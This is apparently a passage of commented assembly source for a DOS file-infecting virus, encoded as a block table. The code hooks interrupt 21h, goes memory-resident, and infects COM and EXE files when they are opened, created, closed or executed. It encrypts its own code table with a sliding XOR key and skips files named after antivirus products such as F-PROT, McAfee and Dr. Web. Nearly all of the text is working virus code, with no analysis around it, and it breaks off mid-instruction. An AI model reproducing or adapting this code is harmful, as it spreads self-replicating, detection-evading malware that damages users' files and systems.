db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial IP at stack db 11101101b ; Data reference dw 138bh ; Pointer to initial_ip_ db 01h ; One byte instruction push ax ; Save segment of PSP for current ... db 04h ; Four bytes instruction push [bp+1234h] ; Save size of memory block in par... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 01h ; One byte instruction push ds ; Save DS at stack db 02h ; Two bytes instruction mov cl,00h ; COM executable db 04h ; Four bytes instruction cmp [bp+1234h],cl ; COM executable? db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 01110101b+10000000b ; Not equal? Jump to move_virus__ dw 1390h ; Pointer to move_virus__ db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of origin_code_ db 11101101b ; Data reference dw 1f40h ; Pointer to origin_code_ db 03h ; Three bytes instruction mov ax,cs:[si] ; AX = first two bytes of original... db 04h ; Four bytes instruction mov cs:[100h],ax ; Store first two bytes of origina... db 04h ; Four bytes instruction mov al,cs:[si+02h] ; AL = last byte of original code ... db 04h ; Four bytes instruction mov cs:[100h+02h],al ; Store last byte of original code... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1390h ; Pointer to move_virus__ db 11101111b ; End of block db 11101110b ; Beginning of block dw 1774h db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = segment of PSP for current ... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial SS relative to star... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial SS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... 
db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial SP at stack db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial CS relative to star... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial CS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save incorrect IP at stack db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 01h ; One byte instruction push ax ; Save segment of PSP for current ... db 04h ; Four bytes instruction push [bp+1234h] ; Save size of memory block in par... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 01h ; One byte instruction push ds ; Save DS at stack db 02h ; Two bytes instruction mov cl,00h ; COM executable db 04h ; Four bytes instruction cmp [bp+1234h],cl ; COM executable? db 11101101b ; Data reference dw 1388h ; Pointer to executa_sta db 01110101b+10000000b ; Not equal? Jump to move_virus__ dw 1390h ; Pointer to move_virus__ db 04h ; Four bytes instruction lea si,[bp+1234h] ; SI = offset of incorr_code_ db 11101101b ; Data reference dw 1776h ; Pointer to incorr_code_ db 03h ; Three bytes instruction mov ax,cs:[si] ; AX = first two bytes of incorrec... db 04h ; Four bytes instruction mov cs:[100h],ax ; Store first two bytes of incorre... db 04h ; Four bytes instruction mov al,cs:[si+02h] ; AL = last byte of incorrect code db 04h ; Four bytes instruction mov cs:[100h+02h],al ; Store last byte of incorrect code db 11101001b ; JMP imm16 (opcode 0e9h) dw 1390h ; Pointer to move_virus__ db 11101111b ; End of block move_virus__ db 11101110b ; Beginning of block dw 1390h ; Block identification of move_vir... 
db 02h ; Two bytes instruction xor ax,ax ; Zero AX db 02h ; Two bytes instruction mov ds,ax ; DS = segment of DOS communicatio... db 05h ; Five bytes instruction cmp byte ptr ds:[501h],10h db 01110100b+10000000b ; Already resident? Jump to virus_... dw 65h ; Pointer to virus_exit_ db 05h ; Five bytes instruction mov byte ptr ds:[501h],10h db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction pop ds ; Load DS from stack (ES) db 03h ; Three bytes instruction mov ax,ds:[0ch] ; AX = offset within next virus ge... db 03h ; Three bytes instruction sub ax,730h ; Subtract offset of next virus ge... db 04h ; Four bytes instruction mov [bp+1234h],ax ; Store offset of virus_exit db 11101101b ; Data reference dw 0bf1h ; Pointer to vir_exit_of db 04h ; Four bytes instruction mov cx,ds:[0eh] ; CX = length of virus db 04h ; Four bytes instruction mov [bp+1234h],cx ; Store length of virus db 11101101b ; Data reference dw 0bf0h ; Pointer to virus_lengt db 03h ; Three bytes instruction mov si,730h ; SI = offset of next virus genera... db 02h ; Two bytes instruction xor di,di ; Zero DI db 02h ; Two bytes instruction rep movsb ; Move virus to top of memory db 02h ; Two bytes instruction mov cl,04h ; Divide by paragraphs db 02h ; Two bytes instruction shr di,cl ; DI = length of next virus genera... db 01h ; One byte instruction inc di ; Increase length of next virus ge... db 04h ; Four bytes instruction mov bx,[bp+1234h] ; BX = size of memory block in par... db 11101101b ; Data reference dw 1394h ; Pointer to mcb_size___ db 04h ; Four bytes instruction sub bx,[bp+1234h] ; Subtract new size in paragraphs ... db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction sub bx,di ; Subtract length of next virus ge... db 01h ; One byte instruction dec bx ; Decrease new size in paragraphs db 01h ; One byte instruction dec bx ; Decrease new size in paragraphs db 02h ; Two bytes instruction cmp bx,di ; Insufficient memory? 
db 01110010b+10000000b ; Below? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov bx,di ; BX = number of paragraphs to all... db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov es,ax ; ES = segment of current Memory C... db 07h ; Seven bytes instruction mov word ptr es:[01h],08h db 01h ; One byte instruction inc ax ; AX = segment of PSP for current ... db 02h ; Two bytes instruction mov es,ax ; AX = segment of PSP for current ... db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = length of virus db 11101101b ; Data reference dw 0bf0h ; Pointer to virus_lengt db 02h ; Two bytes instruction xor si,si ; Zero SI db 02h ; Two bytes instruction xor di,di ; Zero DI db 02h ; Two bytes instruction rep movsb ; Move virus to top of memory db 01h ; One byte instruction push es ; Save ES at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save offset of virus_exit_ at stack db 11101101b ; Data reference dw 0bf1h ; Pointer to vir_exit_of db 04h ; Four bytes instruction mov al,[bp+1234h] ; AL = 8-bit encryption/decryption... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 04h ; Four bytes instruction mov ah,[bp+1234h] ; AH = 8-bit sliding encryption/de... 
db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 01h ; One byte instruction retf ; Return far db 11101111b ; End of block terminate_ db 11101110b ; Beginning of block dw 0beeh ; Block identification of terminate_ db 03h ; Three bytes instruction mov ax,4c00h ; Terminate with return code db 02h ; Two bytes instruction int 21h db 11101111b ; End of block get_rnd_num_ db 11101110b ; Beginning of block dw 0bd4h ; Block identification of get_rnd_... db 01h ; One byte instruction push cx ; Save CX at stack db 02h ; Two bytes instruction in al,40h ; AL = 8-bit random number db 02h ; Two bytes instruction mov ah,al ; AH = 8-bit random number db 02h ; Two bytes instruction in al,40h ; AL = 8-bit random number db 05h ; Five bytes instruction xor ax,es:[02h] ; AX = 16-bit random number db 02h ; Two bytes instruction mov cl,ah ; CL = high-order byte of 16-bit r... db 02h ; Two bytes instruction rol ax,cl ; AX = 16-bit random number db 04h ; Four bytes instruction mov es:[02h],ax ; Store 16-bit random number db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block rnd_in_rang db 11101110b ; Beginning of block dw 0bd5h ; Block identification of rnd_in_rang db 02h ; Two bytes instruction or bp,bp ; Zero BP? db 01110100b+10000000b ; Zero? 
Jump to zero_range_ dw 0bd6h ; Pointer to zero_range_ db 01h ; One byte instruction push dx ; Save DX at stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd4h ; Pointer to get_rnd_num_ db 02h ; Two bytes instruction xor dx,dx ; Zero DX db 02h ; Two bytes instruction div bp ; DX = random number within range db 01h ; One byte instruction xchg ax,dx ; AX = random number within range db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block zero_range_ db 11101110b ; Beginning of block dw 0bd6h ; Block identification of zero_range_ db 02h ; Two bytes instruction xor ax,ax ; AX = random number within range db 01h ; One byte instruction ret ; Return db 11101111b ; End of block decrypt_byt db 11101110b ; Beginning of block dw 0be0h ; Block identification of decrypt_byt db 04h ; Four bytes instruction mov [bp+1234h],ah ; Store AH db 11101101b ; Data reference dw 0bd9h ; Pointer to ah__ db 02h ; Two bytes instruction mov ax,si ; AX = offset within table db 02h ; Two bytes instruction sub ax,bp ; Subtract delta offset from offse... db 03h ; Three bytes instruction sub ax,1234h ; Subtract offset of tmc_table_ fr... db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 04h ; Four bytes instruction mul word ptr [bp+1234h] ; AL = 8-bit sliding encryption/de... db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 04h ; Four bytes instruction add al,[bp+1234h] ; AL = 8-bit encryption/decryption... 
db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 02h ; Two bytes instruction xor al,[si] ; AL = byte of decrypted table db 04h ; Four bytes instruction mov ah,[bp+1234h] ; AH = stored AH db 11101101b ; Data reference dw 0bd9h ; Pointer to ah__ db 01h ; One byte instruction inc si ; Increase offset within table db 01h ; One byte instruction ret ; Return db 11101111b ; End of block decrypt_id_ db 11101110b ; Beginning of block dw 0be1h ; Block identification of decrypt_id_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction mov ah,al ; AL = byte of decrypted table db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction xchg al,ah ; AL = byte of decrypted table db 01h ; One byte instruction ret ; Return db 11101111b ; End of block virus_exit_ db 11101110b ; Beginning of block dw 65h ; Block identification of virus_exit_ db 01h ; One byte instruction pop es ; Load ES from stack db 02h ; Two bytes instruction mov ah,49h ; Free memory db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 02h ; Two bytes instruction mov ds,ax ; DS = segment of PSP for current ... db 02h ; Two bytes instruction mov es,ax ; DS = segment of PSP for current ... db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 04h ; Four bytes instruction lea bx,[bp+1234h] ; BX = offset of jmp_imm32_ db 11101101b ; Data reference dw 1391h ; Pointer of jmp_imm32_ db 01h ; One byte instruction pop ax ; Load AX from stack (initial IP) db 04h ; Four bytes instruction mov cs:[bx+01h],ax ; Store initial IP db 01h ; One byte instruction pop ax ; Load AX from stack (initial CS ...) db 04h ; Four bytes instruction mov cs:[bx+03h],ax ; Store initial CS relative to sta... 
db 01h ; One byte instruction pop ax ; Load AX from stack (initial SP) db 01h ; One byte instruction pop ss ; Load SS from stack (initial SS ...) db 02h ; Two bytes instruction mov sp,ax ; SP = stack pointer db 11101001b ; JMP imm16 (opcode 0e9h) dw 1391h ; Pointer of jmp_imm32_ db 11101111b ; End of block jmp_imm32_ db 11101110b ; Beginning of block dw 1391h ; Block identification of jmp_imm32_ db 05h+10h ; Five bytes data db 11101010b ; JMP imm32 (opcode 0eah) dd 00h ; Pointer to virus in top of memory db 11101111b ; End of block ah__ db 11101110b ; Beginning of block dw 0bd9h ; Block identification of ah__ db 01h+10h ; One byte data db 00h ; Accumulator register (high-orde...) db 11101111b ; End of block probability_ db 11101110b ; Beginning of block dw 0bech ; Block identification of probabil... db 02h+10h ; Two bytes data dw 32h ; Probability db 11101111b ; End of block crypt_key_ db 11101110b ; Beginning of block dw 0bd7h ; Block identification of crypt_key_ db 01h+10h ; One data byte db 00h ; 8-bit encryption/decryption key db 11101111b ; End of block sliding_key_ db 11101110b ; Beginning of block dw 0bd8h ; Block identification to sliding_... db 02h+10h ; Two bytes data dw 00h ; 8-bit sliding encryption/decrypt... db 11101111b ; End of block executa_sta db 11101110b ; Beginning of block dw 1388h ; Block identification of executa_sta db 01h+10h ; One byte data db 00h ; Executable status db 11101111b ; End of block origin_code_ db 11101110b ; Beginning of block dw 1f40h ; Block identification of origin_c... db 03h+10h ; Three bytes data db 11000011b,02h dup(00h) db 11101111b ; End of block incorr_code_ db 11101110b ; Beginning of block dw 1776h ; Block identification of incorr_c... db 03h+10h ; Three bytes data db 11000011b,02h dup(00h) db 11101111b ; End of block initial_cs_ db 11101110b ; Beginning of block dw 1389h ; Block identification of initial_cs_ db 02h+10h ; Two bytes data dw 0fff0h ; Initial CS relative to start of ... 
db 11101111b ; End of block initial_ss_ db 11101110b ; Beginning of block dw 138ah ; Block identification of initial_ss_ db 02h+10h ; Two bytes data dw 0fff0h ; Initial SS relative to start of ... db 11101111b ; End of block initial_ip_ db 11101110b ; Beginning of block dw 138bh ; Block identification of initial_ip_ db 02h+10h ; Two bytes data dw 100h ; Initial IP db 11101111b ; End of block incorrec_ip db 11101110b ; Beginning of block dw 1773h ; Block identification of incorrec_ip db 02h+10h ; Two bytes data dw 100h ; Incorrect IP db 11101111b ; End of block initial_sp_ db 11101110b ; Beginning of block dw 138ch ; Block identification of initial_sp_ db 02h+10h ; Two bytes data dw 0fffeh ; Initial SP db 11101111b ; End of block new_mcb_siz db 11101110b ; Beginning of block dw 1393h ; Block identification of new_mcb_siz db 02h+10h ; Two bytes data dw 1000h ; New size in paragraphs db 11101111b ; End of block mcb_size__ db 11101110b ; Beginning of block dw 1395h ; Block identification of mcb_size__ db 02h+10h ; Two bytes data dw 0ffffh ; Size of memory block in paragraphs db 11101111b ; End of block mcb_size___ db 11101110b ; Beginning of block dw 1394h ; Block identification of mcb_size___ db 02h+10h ; Two bytes data dw 00h ; Size of memory block in paragraphs db 11101111b ; End of block program_seg_ db 11101110b ; Beginning of block dw 0befh ; Block identification of program_... 
db 02h+10h ; Two bytes data dw 00h ; Segment of PSP for current process db 11101111b ; End of block virus_lengt db 11101110b ; Beginning of block dw 0bf0h ; Block identification of virus_lengt db 02h+10h ; Two bytes data dw 00h ; Length of virus db 11101111b ; End of block vir_exit_of db 11101110b ; Beginning of block dw 0bf1h ; Block identification of vir_exit_of db 02h+10h ; Two bytes data dw 00h ; Offset of virus_exit_ db 11101111b ; End of block tmc_table_ db 11101110b ; Beginning of block dw 4c5h ; Block identification of tmc_table_ db 11101111b ; End of block db 00h ; End of table second_table db 11101111b ; End of block virus_end: crypt_table db 11101110b ; Beginning of block dw 66h ; Block identification of crypt_table db 02h ; Two bytes instruction xor bp,bp ; Zero BP db 02h ; Two bytes instruction mov ds,bp ; DS = segment of BIOS data segment db 04h ; Four bytes instruction mov bx,ds:[46dh] ; BX = timer ticks since midnight db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 03h ; Three bytes instruction and bx,1111111111110000b db 04h ; Four bytes instruction mov ds:[1234h],bx ; Store timer ticks since midnight db 11101101b ; Data reference dw 13adh ; Pointer to timer_ticks db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bfeh ; Pointer to crypt_table_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd4h ; Pointer to get_rnd_num_ db 03h ; Three bytes instruction mov ds:[1234h],al ; Store 8-bit encryption/decryptio... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 04h ; Four bytes instruction mov ds:[1234h],ah ; Store 8-bit sliding encryption/d... 
db 11101101b ; Data reference dw 0bd8h ; Pointer to sliding_key_ db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bfeh ; Pointer to crypt_table_ db 03h ; Three bytes instruction mov ax,3521h ; Get interrupt vector 21h db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction mov di,1234h ; DI = offset of int21_addr db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 02h ; Two bytes instruction mov [di],bx ; Store offset of interrupt 21h db 03h ; Three bytes instruction mov [di+02h],es ; Store segment of interrupt 21h db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of int21_virus db 11101101b ; Data reference dw 0c8h ; Pointer to int21_virus db 03h ; Three bytes instruction mov ax,2521h ; Set interrupt vector 21h db 02h ; Two bytes instruction int 21h db 11101001b ; JMP imm16 (opcode 0e9h) dw 65h ; Pointer to virus_exit_ db 11101111b ; End of block crypt_table_ db 11101110b ; Beginning of block dw 0bfeh ; Block identification of crypt_ta... db 03h ; Three bytes instruction mov si,1234h ; SI = offset of tmc_table_ db 11101101b ; Data reference dw 4c5h ; Pointer to tmc_table_ db 03h ; Three bytes instruction mov cx,(code_end-first_table) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bffh ; Pointer to crypt_loop db 11101111b ; End of block crypt_loop db 11101110b ; Beginning of block dw 0bffh ; Block identification of crypt_loop db 02h ; Two bytes instruction xor [si],al ; Encrypt byte of table db 01h ; One byte instruction inc si ; Increase offset within table db 02h ; Two bytes instruction add al,ah ; Add 8-bit sliding encryption key... db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? 
Jump to crypt_loop dw 0bffh ; Pointer to crypt_loop db 01h ; One byte instruction ret ; Return db 11101111b ; End of block int21_virus db 11101110b ; Beginning of block dw 0c8h ; Block identification of int21_virus db 01h ; One byte instruction cld ; Clear direction flag db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a0h ; Pointer to push_regs db 03h ; Three bytes instruction cmp ah,3ch ; Create file? db 01110100b+10000000b ; Equal? Jump to exam_drv_let dw 139ah ; Pointer to exam_drv_let db 03h ; Three bytes instruction cmp ah,3dh ; Open file? db 01110100b+10000000b ; Equal? Jump to exam_drv_let dw 139ah ; Pointer to exam_drv_let db 03h ; Three bytes instruction cmp ah,3eh ; Close file? db 01110100b+10000000b ; Equal? Jump to infect_fil dw 139ch ; Pointer to infect_fil db 03h ; Three bytes instruction cmp ah,4bh ; Load and/or execute program? db 01110101b+10000000b ; Not equal? Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a9h ; Pointer to infect_file db 11101111b ; End of block infect_file db 11101110b ; Beginning of block dw 13a9h ; Block identification of infect_file db 11101000b ; CALL imm16 (opcode 0e8h) dw 1392h ; Pointer to infect_fil_ db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a6h ; Pointer to int21_exit db 11101111b ; End of block int21_exit db 11101110b ; Beginning of block dw 13a6h ; Block identification of int21_exit db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 05h ; Five bytes instruction jmp dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 11101111b ; End of block exam_drv_let db 11101110b ; Beginning of block dw 139ah ; Block identification of exam_drv... db 02h ; Two bytes instruction mov si,dx ; SI = offset of filename db 01h ; One byte instruction lodsb ; AL = first byte of filename db 03h ; Three bytes instruction cmp byte ptr [si],':' ; Does filename include drive letter? db 01110101b+10000000b ; Not equal? 
Jump to exam_def_drv dw 139bh ; Pointer to exam_def_drv db 02h ; Two bytes instruction or al,20h ; Lowercase character db 02h ; Two bytes instruction cmp al,'b' ; Floppy disk? db 01110111b+10000000b ; Above? Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a8h ; Pointer to infect_file_ db 11101111b ; End of block exam_def_drv db 11101110b ; Beginning of block dw 139bh ; Block identification of exam_def... db 01h ; One byte instruction push ax ; Save AX at stack db 02h ; Two bytes instruction mov ah,19h ; Get current default drive db 02h ; Two bytes instruction int 21h db 02h ; Two bytes instruction cmp al,01h ; Floppy disk? db 01h ; One byte instruction pop ax ; Load AX from stack db 01110111b+10000000b ; Above? Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101001b ; JMP imm16 (opcode 0e9h) dw 13a8h ; Pointer to infect_file_ db 11101111b ; End of block infect_file_ db 11101110b ; Beginning of block dw 13a8h ; Block identification of infect_f... db 03h ; Three bytes instruction cmp ah,3ch ; Create file? db 01110101b+10000000b ; Not equal? Jump to infect_file dw 13a9h ; Pointer to infect_file db 02h ; Two bytes instruction xor bx,bx ; Zero file handle db 11101000b ; CALL imm16 (opcode 0e8h) dw 13abh ; Pointer to exam_psp_etc db 01110101b+10000000b ; Not zero? 
Jump to int21_exit dw 13a6h ; Pointer to int21_exit db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a4h ; Pointer to int24_store db 02h ; Two bytes instruction mov ah,60h ; Canonicalize filename or path db 01h ; One byte instruction dec si ; SI = offset of filename db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop es ; Load ES from stack (CS) db 03h ; Three bytes instruction mov di,1234h ; DI = offset of filename db 11101101b ; Data reference dw 139eh ; Pointer to filename db 02h ; Two bytes instruction int 21h db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction pushf ; Save flags at stack db 05h ; Five bytes instruction call dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a0h ; Pointer to push_regs db 01h ; One byte instruction pushf ; Save flags at stack db 03h ; Three bytes instruction mov bx,1111111111111111b db 03h ; Three bytes instruction adc bx,00h ; BX = file handle mask db 02h ; Two bytes instruction and ax,bx ; AX = file handle db 04h ; Four bytes instruction mov cs:[1234h],ax ; Store file handle db 11101101b ; Data reference dw 139dh ; Pointer to file_handle db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a5h ; Pointer to int24_load db 01h ; One byte instruction popf ; Load flags from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction sti ; Set interrupt-enable flag db 03h ; Three bytes instruction retf 02h ; Return far and pop two bytes (discards the flags word saved by INT) db 11101111b ; End of block infect_fil db 11101110b ; Beginning of block dw 139ch ; Block identification of infect_fil db 11101000b ; CALL imm16 (opcode 0e8h) dw 13abh ; Pointer to exam_psp_etc db 01110010b+10000000b ; Below? Jump to int21_exit
dw 13a6h ; Pointer to int21_exit db 02h ; Two bytes instruction xor ax,ax ; Zero file handle db 04h ; Four bytes instruction mov cs:[1234h],ax ; Store file handle db 11101101b ; Data reference dw 139dh ; Pointer to file_handle db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction pushf ; Save flags at stack db 05h ; Five bytes instruction call dword ptr cs:[1234h] db 11101101b ; Data reference dw 0c9h ; Pointer to int21_addr db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a0h ; Pointer to push_regs db 01h ; One byte instruction pushf ; Save flags at stack db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of filename db 11101101b ; Data reference dw 139eh ; Pointer to filename db 11101000b ; CALL imm16 (opcode 0e8h) dw 1392h ; Pointer to infect_fil_ db 01h ; One byte instruction popf ; Load flags from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 13a1h ; Pointer to pop_regs db 01h ; One byte instruction sti ; Set interrupt-enable flag db 03h ; Three bytes instruction retf 02h ; Return far and ??? db 11101111b ; End of block exam_psp_etc db 11101110b ; Beginning of block dw 13abh ; Block identification of exam_psp... db 01h ; One byte instruction push bx ; Save BX at stack db 02h ; Two bytes instruction mov ah,62h ; Get current PSP address db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction mov di,1234h ; DI = offset of progra_seg db 11101101b ; Data reference dw 139fh ; Pointer to progra_seg db 03h ; Three bytes instruction cmp cs:[di],bx ; Segment of PSP for current proc...? db 03h ; Three bytes instruction mov cs:[di],bx ; Store segment of PSP for current... db 03h ; Three bytes instruction mov di,1234h ; DI = offset of file_handle db 11101101b ; Data reference dw 139dh ; Pointer to file_handle db 01110101b+10000000b ; Not equal? 
Jump to dont_infect dw 13ach ; Pointer to dont_infect db 01h ; One byte instruction pop bx ; Load BX from stack db 02h ; Two bytes instruction mov ax,bx ; AX = file handle db 03h ; Three bytes instruction sub ax,cs:[di] ; Subtract saved file handle from ... db 03h ; Three bytes instruction add ax,0ffffh ; Add sixty-five thousand five hun... db 01h ; One byte instruction inc ax ; Increase file handle db 01h ; One byte instruction ret ; Return db 11101111b ; End of block dont_infect db 11101110b ; Beginning of block dw 13ach ; Block identification of dont_infect db 05h ; Five bytes instruction mov word ptr cs:[di],00h db 02h ; Two bytes instruction xor ax,ax ; Zero file handle db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction stc ; Set carry flag db 01h ; One byte instruction ret ; Return db 11101111b ; End of block infect_fil_ db 11101110b ; Beginning of block dw 1392h ; Block identification of infect_fil_ db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction pop es ; Load ES from stack (DS) db 02h ; Two bytes instruction mov di,dx ; DI = offset of filename db 03h ; Three bytes instruction mov cx,43h ; CX = number of bytes to search t... db 02h ; Two bytes instruction xor al,al ; Zero AL db 02h ; Two bytes instruction repne scasb ; Find end of filename db 01110101b+10000000b ; Not equal? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction lea si,[di-05h] ; SI = offset of the dot in the fi... db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 03h ; Three bytes instruction mov bx,'mo' ; COM executable db 03h ; Three bytes instruction cmp ax,'c.' ; COM executable? db 01110100b+10000000b ; Equal? Jump to examine_ext dw 0f0h ; Pointer to examine_ext db 03h ; Three bytes instruction mov bx,'ex' ; EXE executable db 03h ; Three bytes instruction cmp ax,'e.' ; EXE executable? 
db 01110100b+10000000b ; Equal? Jump to examine_ext dw 0f0h ; Pointer to examine_ext db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fbh ; Pointer to infect_exit_ db 11101111b ; End of block examine_ext db 11101110b ; Beginning of block dw 0f0h ; Block identification of examine_ext db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 02h ; Two bytes instruction cmp ax,bx ; COM or EXE executable? db 01110101b+10000000b ; Not equal? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction sub si,04h ; SI = offset of the dot in the fi... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1398h ; Pointer to find_name db 11101111b ; End of block find_name db 11101110b ; Beginning of block dw 1398h ; Block identification of find_name db 01h ; One byte instruction dec si ; SI = offset within filename db 02h ; Two bytes instruction mov al,[si] ; AL = byte of filename db 02h ; Two bytes instruction cmp al,'/' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp al,'\' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp al,':' ; Beginning of filename? db 01110100b+10000000b ; Equal? Jump to examine_name dw 1397h ; Pointer to examine_name db 02h ; Two bytes instruction cmp si,dx ; Beginning of filename? db 01110111b+10000000b ; Above? Jump to find_name dw 1398h ; Pointer to find_name db 01h ; One byte instruction dec si ; SI = offset within filename db 11101001b ; JMP imm16 (opcode 0e9h) dw 1397h ; Pointer to examine_name db 11101111b ; End of block examine_name db 11101110b ; Beginning of block dw 1397h ; Block identification of examine_... db 01h ; One byte instruction inc si ; SI = offset of beginning of file...
db 01h ; One byte instruction lodsw ; AX = two bytes of filename db 03h ; Three bytes instruction or ax,2020h ; Lowercase characters db 03h ; Three bytes instruction xor ax,0aa55h ; Encrypt two bytes of filename db 03h ; Three bytes instruction cmp ax,('ci' xor 0aa55h) db 01110100b+10000000b ; Equal? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('on' xor 0aa55h) db 01110100b+10000000b ; NOD-iCE? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('ew' xor 0aa55h) db 01110100b+10000000b ; Dr. Web? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('bt' xor 0aa55h) db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('va' xor 0aa55h) db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('-f' xor 0aa55h) db 01110100b+10000000b ; F-PROT? Jump to infect_exit_ dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('cs' xor 0aa55h) db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('lc' xor 0aa55h) db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_... dw 0fbh ; Pointer to infect_exit_ db 03h ; Three bytes instruction cmp ax,('oc' xor 0aa55h) db 01110100b+10000000b 